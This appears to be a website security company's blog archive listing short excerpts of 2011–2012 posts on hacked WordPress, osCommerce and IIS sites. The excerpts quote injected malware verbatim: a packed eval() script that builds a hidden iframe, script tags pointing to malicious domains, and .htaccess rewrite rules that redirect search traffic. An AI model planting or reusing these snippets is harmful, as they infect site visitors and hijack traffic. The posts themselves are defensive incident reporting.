How to stop the hacker? This is a very common question we get daily. “My site got hacked, how can I stop the hacker from attacking me again?” Stopping the hacker You can’t really stop the hacker from trying to attack your site, but you can stop him from succeeding on his attempts. Specially [...]
Ugly htaccess
February 22, 2012 by
No need to comment: ##!!##!!##!!##!!##!!####!!##!!##!!##!!##!!## RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] [...]
New .htaccess attacks
January 19, 2012 by
Seeing some interesting modifications to the old style of .htaccess attacks. The attackers are using a lot of referer domains and using .in domains (along with the .ru). This is an example of the .htaccess hacked: RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista| msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos| search|metacrawler|bing|dogpile|facebook| twitter|blog|live|myspace|mail|yandex|rambler|ya|aport| linkedin|flickr|nigma|liveinternet|vkontakte| webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km| gigablast|entireweb|amfibi|dmoz|yippy|search| walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut| about|thunderstone|ixquick|terra|lookle| metaeureka|searchspot|slider|topseven|allthesites|libero| clickey|galaxy|brainysearch|pocketflier| verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot |acoon|cyber-content|devaro|fastbot|netzindex| abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv| suchbiene|suchmaschine|web-archiv|web| websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila| sfr|startpagina|kpnvandaag|ilse|wanadoo |telfort|hispavista|passagen|spray|eniro|telia|bluewin| [...]
New Malware – eval(function(p,a,c,k,e,d)
November 4, 2011 by
We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware (using Dean Edwards packer). This is what is gets added to the hacked sites: <script>eval(function(p,a,c,k,e,d){e=function(c) {return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}; if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}]; e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’ \b’,’g’),k[c])}}return p}(‘i 9(){a=6.h(‘b’);7(!a){5 0=6.j(‘k’);6.g.l(0); .. 9()",y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px| MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement| iframe|appendChild|src|id|c0m|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent| 1000|hdghdg|navigator|li|showthread|php| 72241732′.split(‘|’),0,{})) And that code (once decoded by the browser) is used to [...]
SQL injections: nbnjkl.com/urchin.js and jjghui.com/urchin.js
October 13, 2011 by
We are seeing many sites compromised with malware from jjghui.com/urchin.js (and now nbnjkl.com/urchin.js). Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection). This is how it shows on a hacked site: <script src= http://nbnjkl.com/urchin.js ></script> We posted full details [...]
New Malware – sweepstakesandcontestsnow.com
September 19, 2011 by
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with a malware from sweepstakesandcontestsnow.com. This is what is gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
September 13, 2011 by
We are often asked what were the top domains distributing malware or what threats we see more often on our security scanner. For the month of August, things were very similar to the previous ones, with a slightly increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]
Malware update – Timthumb.php and .htaccess redirection
August 21, 2011 by
We have been very busy in our blog explaining about the latest TimThumb.php vulnerability and the affect it is having on WordPress web sites. If you missed the articles, please check here: TimThumb.php – Just the tip of the iceberg Attacks Against Timthumb.php in the Wild – List of Themes and Plugins Being Scanned [...]
osCommerce compromises – Now from tiasissi.com.br
August 12, 2011 by
We have been blogging about the “willysy” malware for a little while, but the attacks against osCommerce are still happening and very active. The latest change is that the “willysy.com” (or exero.eu) type of injection have switched to http://tiasissi.com.br/revendedores/jquery/. That’s what shows up on the hacked sites: <script src= http://tiasissi.com.br/revendedores/jquery/> Sucuri identifies those type of web-based [...]
More spam (via .htaccess) to search-box.in and malware from savebotstat.com
August 9, 2011 by
Very interesting .htaccess redirection to send traffic from Google and Yahoo image search to search-box.in. That’s what gets added to the hacked site: AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm (10:13:28 AM) kbc_: RewriteEngine On (10:13:29 AM) kbc_: RewriteOptions inherit (10:13:30 AM) kbc_: RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR] (10:13:31 AM) kbc_: RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [...]
